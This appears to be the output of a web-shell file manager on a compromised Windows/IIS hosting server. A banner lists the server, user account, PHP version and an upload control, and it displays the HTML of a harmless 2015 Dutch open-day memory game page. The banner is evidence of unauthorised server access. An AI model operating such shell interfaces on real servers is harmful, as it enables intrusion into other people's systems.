HEX
Server: Microsoft-IIS/8.5
System: Windows NT YDAWBH120 6.3 build 9600 (Windows Server 2012 R2 Standard Edition) AMD64
User: tentjecom_web (0)
PHP: 7.4.14
Disabled: NONE
Upload Files
File: D:/HostingSpaces/SBogers10/opendag.komma.pro/wwwroot/index.html
<!--
To change this template, choose Tools | Templates
and open the template in the editor.
-->
<!DOCTYPE html>
<html>
<head>
	<title>Komma Open dag 2015</title>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>
	<script src="http://code.jquery.com/ui/1.9.2/jquery-ui.min.js"></script>
	<script src="js/tile.js"></script>
	<script src="js/jquery.flip.js"></script>
	<script src="js/matching.js"></script>
	<link rel="stylesheet" type="text/css" href="css/style.css"/>
</head>
<body>
<header>
    <h1>Komma open dag 2015 Memory spel</h1>
    <p class="pogingen">Poging: <span class="poging">0</span></p>
    <p class="scoreblock">Score: <span class="score">20000</span></p>
    <a href='#' id="startGameButton">Nieuw spel</a>
    <div class="clear"></div>
</header>
	<article id="game">
		<section id="board">
		</section>

        <div class="clear"></div>
    </article>
	<audio id="audioEngine">
	  <source src="mp3/applause.mp3" type="audio/mpeg">
	Your browser does not support the audio element.
	</audio>
</body>
</html>